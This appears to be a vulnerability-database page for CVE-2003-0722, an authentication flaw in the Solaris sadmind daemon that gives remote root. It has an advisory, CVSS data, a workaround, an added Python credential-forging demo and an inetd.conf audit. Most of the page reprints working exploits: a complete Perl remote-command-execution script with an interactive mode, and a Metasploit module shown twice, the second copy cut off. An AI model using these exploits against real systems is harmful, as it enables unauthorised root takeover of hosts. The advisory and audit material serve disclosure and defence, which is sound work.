CVE-2003-0722
CVSS 10.0
Published: 2003-09-22 00:00:00
Revised: 2016-10-17 22:36:54

[Original] The default installation of sadmind on Solaris uses weak authentication (AUTH_SYS), which allows local and remote attackers to spoof Solstice AdminSuite clients and gain root privileges via a certain sequence of RPC packets.


[CNNVD] Sun Solaris sadmind Remote Command Execution Vulnerability (CNNVD-200309-022)

        
        sadmind is a daemon shipped with Solaris; Solstice AdminSuite applications use it to carry out distributed system administration operations.
        The authentication implemented by Sun's sadmind is flawed, and a remote attacker can exploit it to execute arbitrary commands on the system with root privileges.
        sadmind has three security levels that decide whether a client may run a given operation on the server. At level 0 the user and group IDs of every client are mapped to nobody, and an operation is permitted only if nobody has access to it; this level is intended for testing only. Level 1 sets the authentication type to WEAK: the client's user/group IDs are taken from the authentication information the client supplies, which may be sent with either the AUTH_SYS or the AUTH_DES mechanism. sadmind runs at this level by default. Level 2 sets the authentication type to STRONG and accepts AUTH_DES only.
        Under weak authentication an AUTH_SYS identity is trivially forged, because the uid, gid and machine name it carries are plain values chosen by the client with no verifier behind them; the sadmind man page therefore recommends this level only in genuinely trusted environments. By sending a request with an AUTH_SYS credential claiming uid 0, a user can pose as root on the server and execute arbitrary commands as root. The public exploit additionally sets the request's ADM_CLIENT_HOST field to the server's own hostname, which sadmind reveals in the 'Security exception on host ...' error it returns for a wrong name, so the request is processed as if it were local.
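The AUTH_SYS credential and the three -S levels, modelled as an added Python example (this is not code from the page, from Sun or from the exploit authors): it builds the ONC RPC call header an attacker sends, with an AUTH_SYS credential claiming uid 0 from the target's own hostname, decodes it the way a server would, and applies the level 0/1/2 policy described above. The RPC program 100232, version 10 and procedure 1 are taken from the exploits further down this page; the Solaris nobody uid/gid value 60001 and the hostname "victim" are assumptions. AUTH_DES verification is deliberately not implemented, since the point is that an AUTH_SYS credential carries nothing a server could verify.

```python
"""ONC RPC AUTH_SYS credentials and the sadmind -S 0/1/2 policy (added example, not from the page)."""
import struct
import time

# opaque_auth flavors (RFC 5531); AUTH_DES is the Secure RPC flavor that sadmind -S 2 demands
AUTH_NONE, AUTH_SYS, AUTH_SHORT, AUTH_DES = 0, 1, 2, 3
RPC_CALL, RPC_VERSION = 0, 2
SADMIND_PROG, SADMIND_VERS, SADMIND_PROC = 100232, 10, 1   # as used by the exploits on this page
NOBODY_UID = NOBODY_GID = 60001                            # Solaris 'nobody' (assumed value)


def xdr_u32(value):
    return struct.pack(">I", value & 0xFFFFFFFF)


def xdr_opaque(data):
    """Variable-length opaque: 4-byte length, the bytes, zero padding to a 4-byte boundary."""
    return xdr_u32(len(data)) + data + b"\x00" * (-len(data) % 4)


def authsys_parms(machinename, uid, gid, gids=(), stamp=None):
    """authsys_parms body. Nothing in it is keyed or signed; the client simply asserts it."""
    stamp = int(time.time()) if stamp is None else stamp
    return (xdr_u32(stamp) + xdr_opaque(machinename.encode()) + xdr_u32(uid) + xdr_u32(gid)
            + xdr_u32(len(gids)) + b"".join(xdr_u32(g) for g in gids))


def rpc_call_header(xid, prog, vers, proc, cred_flavor, cred_body):
    """CALL header with the given credential and the empty AUTH_NONE verifier AUTH_SYS calls carry."""
    return (xdr_u32(xid) + xdr_u32(RPC_CALL) + xdr_u32(RPC_VERSION)
            + xdr_u32(prog) + xdr_u32(vers) + xdr_u32(proc)
            + xdr_u32(cred_flavor) + xdr_opaque(cred_body)
            + xdr_u32(AUTH_NONE) + xdr_opaque(b""))


def forged_sadmind_call(target_hostname, xid=0x13370001):
    """The credential the exploits send: uid 0 / gid 0, machine name set to the target's own hostname."""
    cred = authsys_parms(target_hostname, uid=0, gid=0, stamp=0)
    return rpc_call_header(xid, SADMIND_PROG, SADMIND_VERS, SADMIND_PROC, AUTH_SYS, cred)


class XdrReader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def u32(self):
        (value,) = struct.unpack_from(">I", self.data, self.pos)
        self.pos += 4
        return value

    def opaque(self):
        length = self.u32()
        chunk = self.data[self.pos:self.pos + length]
        self.pos += length + (-length % 4)
        return chunk


def parse_call(msg):
    """Server-side view: header fields plus the decoded AUTH_SYS credential when that flavor is used."""
    r = XdrReader(msg)
    call = {name: r.u32() for name in ("xid", "msg_type", "rpcvers", "prog", "vers", "proc")}
    call["cred_flavor"], cred_body = r.u32(), r.opaque()
    call["verf_flavor"], call["verf_body"] = r.u32(), r.opaque()
    call["cred"] = None
    if call["cred_flavor"] == AUTH_SYS:
        c = XdrReader(cred_body)
        cred = {"stamp": c.u32(), "machinename": c.opaque().decode(), "uid": c.u32(), "gid": c.u32()}
        cred["gids"] = [c.u32() for _ in range(c.u32())]
        call["cred"] = cred
    return call


def sadmind_identity(call, security_level):
    """uid/gid sadmind would act under at each -S level; PermissionError when the call is refused."""
    flavor = call["cred_flavor"]
    if security_level == 0:                       # every caller becomes nobody (testing only)
        return NOBODY_UID, NOBODY_GID
    if security_level == 1:                       # WEAK, the default: AUTH_SYS or AUTH_DES
        if flavor == AUTH_SYS:
            return call["cred"]["uid"], call["cred"]["gid"]   # taken exactly as the client asserted
        if flavor == AUTH_DES:
            raise NotImplementedError("AUTH_DES verifier checking is outside this example")
        raise PermissionError("credential flavor not accepted")
    if security_level == 2:                       # STRONG: AUTH_DES only
        if flavor != AUTH_DES:
            raise PermissionError("AUTH_DES required at -S 2")
        raise NotImplementedError("AUTH_DES verifier checking is outside this example")
    raise ValueError("security level must be 0, 1 or 2")


def outcome_per_level(target_hostname="victim"):
    """Run the forged call through all three levels, e.g. {0: (60001, 60001), 1: (0, 0), 2: 'refused'}."""
    call = parse_call(forged_sadmind_call(target_hostname))
    results = {}
    for level in (0, 1, 2):
        try:
            results[level] = sadmind_identity(call, level)
        except PermissionError:
            results[level] = "refused"
    return results


if __name__ == "__main__":
    print(outcome_per_level())
```

At level 1 the decoded credential is used as the caller's identity, so the forged uid 0 becomes root with no further check; only level 2 refuses the flavor outright, which is why the workaround below is "-S 2" or disabling the service, not a configuration tweak within level 1.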
        

- CVSS (Base Score)

CVSS score: 10 [HIGH]
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete
Attack complexity: Low
Attack vector: Network
Authentication: None

- CPE (Affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (Technical details for detection)

oval:org.mitre.oval:def:1273  Solaris SAdmin Client Credentials Remote Administrative Access Vulnerability
*The OVAL definition describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical detection details.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0722
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0722
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-022
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0115.html
(UNKNOWN)  VULNWATCH  20030918 Solaris SADMIND Exploitation
http://marc.info/?l=bugtraq&m=106391959014331&w=2
(UNKNOWN)  BUGTRAQ  20030918 Solaris SADMIND Exploitation
http://sunsolve.sun.com/search/document.do?assetkey=1-26-56740-1&searchclause=security
(UNKNOWN)  SUNALERT  56740
http://www.ciac.org/ciac/bulletins/n-148.shtml
(UNKNOWN)  CIAC  N-148
http://www.idefense.com/advisory/09.16.03.txt
(UNKNOWN)  MISC  http://www.idefense.com/advisory/09.16.03.txt
http://www.kb.cert.org/vuls/id/41870
(UNKNOWN)  CERT-VN  VU#41870
http://www.securityfocus.com/bid/8615
(UNKNOWN)  BID  8615

- Vulnerability information

Sun Solaris sadmind Remote Command Execution Vulnerability
Critical   Design Error
2003-09-22 00:00:00   2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * Disable the 'sadmind' service, or raise its security level to 2. Taking Solaris 8 as an example:
         1. Become root
         $ su -
         #
         2. Kill the running sadmind process
         # ps -ef|grep sadmind|grep -v grep
         # kill -9 <sadmind PID>
         3. Edit /etc/inetd.conf
         Comment out the line containing sadmind:
         #100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind
         or set sadmind's security level to 2:
         100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2
         4. Then make inetd re-read its configuration
         # kill -HUP <inetd PID>
         Other affected releases can follow the same steps.
        * Filter access to the RPC portmapper port (TCP/UDP 111) and to the port sadmind listens on at the firewall. Note that this does not prevent attacks from inside the network.
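An audit for the inetd.conf part of the workaround, as an added Python example (not from CNNVD or Sun): it classifies each sadmind entry in an inetd.conf as disabled (commented out), strong (started with -S 2) or weak (no -S, -S 0 or -S 1; the daemon default is level 1), so the same check can be run before and after the edit. The inetd.conf content is constructed for this example and deliberately holds several sadmind lines to exercise every state; a real file has one.

```python
"""Audit inetd.conf sadmind entries against the workaround above (added example, not from CNNVD or Sun)."""
import re

SADMIND_RPC_PROG = "100232"      # inetd.conf names RPC services by program number/version, not by name

# Constructed sample. A real inetd.conf has one sadmind line; several are shown to exercise each state.
SAMPLE_INETD_CONF = """\
# Solaris inetd.conf excerpt (constructed for this example)
ftp        stream  tcp      nowait  root  /usr/sbin/in.ftpd  in.ftpd
100232/10  tli     rpc/udp  wait    root  /usr/sbin/sadmind  sadmind
#100232/10 tli     rpc/udp  wait    root  /usr/sbin/sadmind  sadmind
100232/10  tli     rpc/udp  wait    root  /usr/sbin/sadmind  sadmind -S 2
100232/10  tli     rpc/udp  wait    root  /usr/sbin/sadmind  sadmind -S 0
"""


def sadmind_security_level(server_argv):
    """-S level sadmind is started with; absent means the daemon default, 1 (WEAK)."""
    for i, tok in enumerate(server_argv):
        if tok == "-S" and i + 1 < len(server_argv) and server_argv[i + 1].isdigit():
            return int(server_argv[i + 1])
        joined = re.fullmatch(r"-S(\d)", tok)          # also accept the glued form -S2
        if joined:
            return int(joined.group(1))
    return 1


def classify_inetd_line(line):
    """None for non-sadmind lines; else 'disabled', 'strong' (-S 2) or 'weak' (-S 0, -S 1 or no -S)."""
    stripped = line.strip()
    if not stripped:
        return None
    commented = stripped.startswith("#")
    # inetd.conf fields: service socket-type protocol wait/nowait user server-program server-argv...
    fields = stripped.lstrip("#").split()
    if len(fields) < 7:
        return None
    if not (fields[0].startswith(SADMIND_RPC_PROG + "/") or fields[5].endswith("/sadmind")):
        return None
    if commented:
        return "disabled"
    return "strong" if sadmind_security_level(fields[6:]) == 2 else "weak"


def audit_inetd_conf(text):
    """(line number, state) for every sadmind entry found, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        state = classify_inetd_line(line)
        if state is not None:
            findings.append((lineno, state))
    return findings


def needs_action(findings):
    """True when any active sadmind entry still runs below -S 2, i.e. the CVE-2003-0722 condition."""
    return any(state == "weak" for _, state in findings)


if __name__ == "__main__":
    for lineno, state in audit_inetd_conf(SAMPLE_INETD_CONF):
        print(f"line {lineno}: {state}")
    print("action needed" if needs_action(audit_inetd_conf(SAMPLE_INETD_CONF)) else "ok")
```

Run it against the real file with `audit_inetd_conf(open("/etc/inetd.conf").read())`; a result containing "weak" means the host still matches the default configuration the exploits on this page target, and inetd must be sent SIGHUP after the file is changed for the new line to take effect.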
        Vendor patch:
        Sun
        ---
        Sun has released security advisory 56740 for this issue; follow the instructions in the advisory to patch:
        56740: Security Issue Involving the Solaris sadmind(1M) Daemon
        Link:
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56740

        Patch downloads:
        SPARC platform
        Solaris 7: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116456&rev=01
        Solaris 8: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116455&rev=01
        Solaris 9: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116453&rev=01
        x86 platform
        Solaris 7: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116457&rev=02
        Solaris 8: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116442&rev=01
        Solaris 9: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116454&rev=01

- Vulnerability information (101)

Solaris Sadmind Default Configuration Remote Root Exploit (EDBID:101)
Platform: solaris   Type: remote
Date: 2003-09-19   Verified
Port: 111   Author: H D Moore
Vulnerable app: N/A
#!/usr/bin/perl -w
##################

##
#      Title: rootdown.pl
#      Purpose: Solaris remote command execution via sadmind
#      Author: H D Moore hdm at metasploit.com
#      Copyright: Copyright (C) 2003 METASPLOIT.COM
##


use strict;
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;

my $VERSION = "1.0";
my %opts;

getopts("h:p:c:r:iv", \%opts);

if ($opts{v}) { show_info() }

if (! $opts{h}) { usage() }

my $target_host = $opts{h};

my $target_name = "exploit";

my $command = $opts{c} ? $opts{c} : "touch /tmp/OWNED_BY_SADMIND_\$\$";
my $portmap = $opts{r} ? $opts{r} : 111;


##
# Determine the port used by sadmind  
##

my $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);

if (! $target_port)
{
    print STDERR "Error: could not determine port used by sadmind\n";
    exit(0);
}

##
#  Determine the hostname of the target
##

my $s = rpc_socket($target_host, $target_port);
my $x = rpc_sadmin_exec($target_name, "id");
print $s $x;
my $r = rpc_read($s);
close ($s);

if ($r && $r =~ m/Security exception on host (.*)\.  USER/)
{
    $target_name = $1;
} else {
    print STDERR "Error: could not obtain target hostname.\n";
    exit(0);
}


##
#  Execute commands :)
##


my $interactive = 0;

if ($opts{i}) { $interactive++ }

do {

    if ($opts{i}) { $command = command_prompt() } else 
    {
        print STDERR "Executing command on '$target_name' via port $target_port\n";
    }
    
    $s = rpc_socket($target_host, $target_port);
    $x = rpc_sadmin_exec($target_name, $command);
    print $s $x;
    $r = rpc_read($s);
    close ($s);

    if ($r) 
    {  
        # Command Failed
        if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x29")
        {
            print STDERR "Error: something went wrong with the RPC format.\n";
            exit(0);
        }

        # Command might have failed
        if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x2b")
        {
            print STDERR "Error: something may have gone wrong with the sadmind format\n";
        }

        # Confirmed success
        if (length($r) == 36 && substr($r, 24, 12) eq ("\x00" x 12))
        {
            print STDERR "Success: your command has been executed successfully.\n";
        }    

        if (length($r) != 36)  { print STDERR "Unknown Response: $r\n" }
        
    } else {
        print STDERR "Error: no response received, you may want to try again.\n";
        exit(0);
    }
    
} while ($interactive);

exit(0);

sub usage {
    print STDERR "\n";
    print STDERR "+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\n\n";
    print STDERR "       Usage:   $0 -h <target> -c <command> [options]\n";
    print STDERR "     Options:\n";
    print STDERR "                -i\tStart interactive mode (for multiple commands)\n";
    print STDERR "                -p\tAvoid the portmapper and use this sadmind port\n";   
    print STDERR "                -r\tQuery alternate portmapper on this UDP port\n";
    print STDERR "                -v\tDisplay information about this exploit\n";    
    
    print STDERR "\n\n";
    exit(0);
}

sub show_info {

print "\n\n";
print "   Name:  rootdown.pl\n";
print " Author:  H D Moore <hdm\@metasploit.com>\n";
print "Version:  $VERSION\n\n";

# not finished :)
print 
"This exploit targets a weakness in the default security settings
of the sadmind RPC application. This application is installed and
enabled by default on most versions of the Solaris operating
system.\n\n".

"The sadmind application defaults to a weak security mode known as
AUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,
the service will accept a structure containing the user and group
IDs as well as the originating system name. These values are not
validated in any form and are completely controlled by the client.
If the standard sadmin RPC API calls are used to generate the request,
the ADM_CLIENT_HOST parameter is filled in with the hostname of the 
client system. If the RPC packet is modified so that this field is
set to the hostname of the remote system, it will be processed as 
if it was a local request. If the user ID is set to zero or the
value of any user in the sysadmin group, it is possible to call
arbitrary methods in any class available to sadmind.\n\n".

"If the Solstice AdminSuite client software has not been installed,
the only class available is 'system', which only contains a single
method called 'admpipe'. The strings within this program seem to
suggest that it can be used to run arbitrary commands, however I chose
a different method of command execution. Since each method is simply 
an executable in the class directory, it is possible to use a 
standard directory traversal attack to execute any application.
We can pass arguments to these methods using the standard API.

An example of spawning a shell which executes the 'id' command:

    # apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\n\n".

"To exploit this vulnerability, we must create a RPC packet that
calls the '/bin/sh' method, passing it the parameter of the command
we want to execute. To do this, packet dumps of the 'apm' tool
were obtained and the format was slowly mapped. The hostname of 
the target system must be known for this exploit to work, however
when sadmind is called with the wrong name, it replies with a
'ACCESS DENIED' error message containing the correct name. The 
final code does the following:

1) Queries the portmapper to determine the sadmind port
2) Sends an invalid request to sadmind to obtain the hostname
3) Uses the hostname to forge the RPC packet and execute commands


This vulnerability was reported by Mark Zielinski and disclosed by iDefense.

Related URLs:

 - http://www.idefense.com/advisory/09.16.03.txt
 - http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view
";





exit(0);
}

sub command_prompt {
    select(STDOUT); $|++;
    
    print STDOUT "\nsadmind> ";
    my $command = <STDIN>;
    chomp($command);
    if (! $command || lc($command) eq "quit" || lc($command) eq "exit")
    {
        print "\nExiting interactive mode...\n";
        exit(0);
    }
    return ($command)
}

sub rpc_socket {
    my ($target_host, $target_port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $target_host, 
        PeerPort => $target_port,
        Proto    => "udp",
        Type     => SOCK_DGRAM
    );

    if (! $s)
    {
        print "\nError: could not create socket to target: $!\n";
        exit(0);
    }

    select($s); $|++;
    select(STDOUT); $|++;
    nonblock($s);
    return($s);
}

sub rpc_read {
    my ($s) = @_;
    my $sel = IO::Select->new($s);
    my $res;
    my @fds = $sel->can_read(4);
    foreach (@fds) { $res .= <$s>; }
    return $res;
}

sub nonblock {
    my ($fd) = @_;
    my $flags = fcntl($fd, F_GETFL,0);
    fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}

sub rpc_getport {
    my ($target_host, $target_port, $prog, $vers) = @_;
    
    my $s = rpc_socket($target_host, $target_port);

    my $portmap_req =
        
        pack("L", rand() * 0xffffffff) . # XID
        "\x00\x00\x00\x00".              # Call
        "\x00\x00\x00\x02".              # RPC Version
        "\x00\x01\x86\xa0".              # Program Number  (PORTMAP)
        "\x00\x00\x00\x02".              # Program Version (2)
        "\x00\x00\x00\x03".              # Procedure (getport)
        ("\x00" x 16).                   # Credentials and Verifier
        pack("N", $prog) .
        pack("N", $vers).
        pack("N", 0x11).                 # Protocol: UDP
        pack("N", 0x00);                 # Port: 0

    print $s $portmap_req;

    my $r = rpc_read($s);
    close ($s);
    
    if (length($r) == 28) 
    { 
        my $prog_port = unpack("N",substr($r, 24, 4));
        return($prog_port); 
    }
    
    return undef;
}


sub rpc_sadmin_exec {

    my ($hostname, $command) = @_;
    my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
    
    
    my $rpc =
        pack("L", rand() * 0xffffffff) . # XID
        "\x00\x00\x00\x00".              # Call
        "\x00\x00\x00\x02".              # RPC Version
        "\x00\x01\x87\x88".              # Program Number  (SADMIND)
        "\x00\x00\x00\x0a".              # Program Version (10)
        "\x00\x00\x00\x01".              # Procedure
        "\x00\x00\x00\x01";              # Credentials (UNIX)
                                         # Auth Length is filled in

    # pad it up to multiples of 4
    my $rpc_hostname = $hostname;
    while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
    
    my $rpc_auth =
        # Time Stamp
        pack("N", time() + 20001) .

        # Machine Name
        pack("N", length($hostname)) . $rpc_hostname .

        "\x00\x00\x00\x00".              # UID = 0
        "\x00\x00\x00\x00".              # GID = 0
        "\x00\x00\x00\x00";              # No Extra Groups  


    $rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);

    my $header =
    
    # Another Time Stamp
    reverse(pack("L", time() + 20005)) .

    "\x00\x07\x45\xdf".
    
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
    
    "\x7f\x00\x00\x01".                 # 127.0.0.1
    "\x00\x01\x87\x88".                 # SADMIND
    
    "\x00\x00\x00\x0a\x00\x00\x00\x04".
    
    "\x7f\x00\x00\x01".                 # 127.0.0.1
    "\x00\x01\x87\x88".                 # SADMIND

    "\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00".

    "\x00\x00\x00\x3b". $packed_host.

    "\x00\x00\x00\x00\x06" . "system".
    
    "\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
    
    # Append Body Length ^-- Here

    my $body = 
    "\x00\x00\x00\x0e". "ADM_FW_VERSION".
    "\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
    "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x08". "ADM_LANG".
    "\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
    "\x00\x01". "C" . 
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x0d". "ADM_REQUESTID".
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x00\x00\x11".
    "0810:1010101010:1"."\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00".

    "\x00\x00\x00\x09". "ADM_CLASS".
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
    "\x00\x00\x00\x06" . "system" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    
    "\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
    "\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
    "\x00\x00\x00\x03". "2.1".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    
    "\x00\x00\x00\x0a" . "ADM_METHOD" . 
    "\x00\x00\x00\x00\x00\x09\x00\x00\x00\x16".
    "\x00\x00\x00\x15". "../../../../../bin/sh" . 
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x08". "ADM_HOST" .
    "\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
    $packed_host.

    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
    "\x00\x00\x00\x00\x09".
    
    pack("N", length($hostname) + 1) .
    pack("N", length($hostname)) .
    $rpc_hostname .
    "\x00\x00\x00\x00". "\x00\x00\x00\x00".
    
    "\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
    "\x00\x00\x00\x00\x00".
    "\x00\x09\x00\x00\x00\x1c".
    "\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    
    "\x00\x00\x00\x09" . "ADM_FENCE" .
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x00\x00\x09\x00".
    "\x00\x00\x03\x00\x00\x00\x02" . "-c" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x59\x00".
    "\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x02\x00".

    $command . ("\x00" x (512 - length($command))).

    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
    "netmgt_endofargs";

    my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;

    return($res);
}



# milw0rm.com [2003-09-19]
		

- Vulnerability information (16324)

Solaris sadmind Command Execution (EDBID:16324)
Platform: multiple   Type: remote
Date: 2010-06-22   Verified
Port: 0   Author: metasploit
Vulnerable app: N/A
##
# $Id: sadmind_exec.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris sadmind Command Execution',
			'Description'    => %q{
					This exploit targets a weakness in the default security
				settings of the sadmind RPC application. This server is
				installed and enabled by default on most versions of the
				Solaris operating system.

				Vulnerable systems include solaris 2.7, 8, and 9
			},
			'Author'         => [ 'vlad902 <vlad902@gmail.com>', 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					['CVE', '2003-0722'],
					['OSVDB', '4585'],
					['BID', '8615'],
					['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => "\x00",
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DisclosureDate' => 'Sep 13 2003',
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		sunrpc_create('udp', 100232, 10)
		sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])

		if !datastore['HOSTNAME']
			print_status('attempting to determine hostname')
			response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")

			if !response
				print_error('no response')
				return
			end

			match = /Security exception on host (.*)\.  USER/.match(response)
			if match
				hostname = match.captures[0]
				print_status("found hostname: #{hostname}")
			else
				print_error('unable to determine hostname')
				return
			end
		else
			hostname = datastore['HOSTNAME']
		end

		response = sadmind_request(hostname, payload.encoded)
		sunrpc_destroy

		if /Security exception on host/.match(response)
			print_error('exploit failed')
			return
		else
			print_status('exploit did not give us an error, this is good...')
			select(nil,nil,nil,1)
			handler
		end
	end

	def sadmind_request(host, command)
		header =
			XDR.encode(0) * 7 +
			XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
				4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
				host, 'system', '../../../bin/sh')

		body =
			do_int('ADM_FW_VERSION', 1) +
			do_string('ADM_LANG', 'C') +
			do_string('ADM_REQUESTID', '00009:000000000:0') +
			do_string('ADM_CLASS', 'system') +
			do_string('ADM_CLASS_VERS', '2.1') +
			do_string('ADM_METHOD', '../../../bin/sh') +
			do_string('ADM_HOST', host) +
			do_string('ADM_CLIENT_HOST', host) +
			do_string('ADM_CLIENT_DOMAIN', '') +
			do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
			do_int('ADM_FENCE', 0) +
			do_string('X', '-c') +
			do_string('Y', command) +
			XDR.encode('netmgt_endofargs')

		request = header + XDR.encode(header.length + body.length - 326) + body

		ret = sunrpc_call(1, request)
		return XDR.decode!(ret, Integer, Integer, String)[2]
	end

	def do_string(str1, str2)
		XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
	end

	def do_int(str, int)
		XDR.encode(str, 3, 4, int, 0, 0)
	end
end
		

- Vulnerability information (F82326)

Solaris sadmind Command Execution (PacketStormID:F82326)
2009-10-28 00:00:00
H D Moore, cazz, vlad902  metasploit.com
exploit
solaris
CVE-2003-0722

This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include solaris 2.7, 8, and 9.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris sadmind Command Execution',
			'Description'    => %q{
				This exploit targets a weakness in the default security
				settings of the sadmind RPC application. This server is
				installed and enabled by default on most versions of the
				Solaris operating system.

				Vulnerable systems include solaris 2.7, 8, and 9
			},
			'Author'         => [ 'vlad902 <vlad902@gmail.com>', 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-0722'],
					['OSVDB', '4585'],
					['BID', '8615'],
					['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => "\x00",
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DisclosureDate' => 'Sep 13 2003',
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
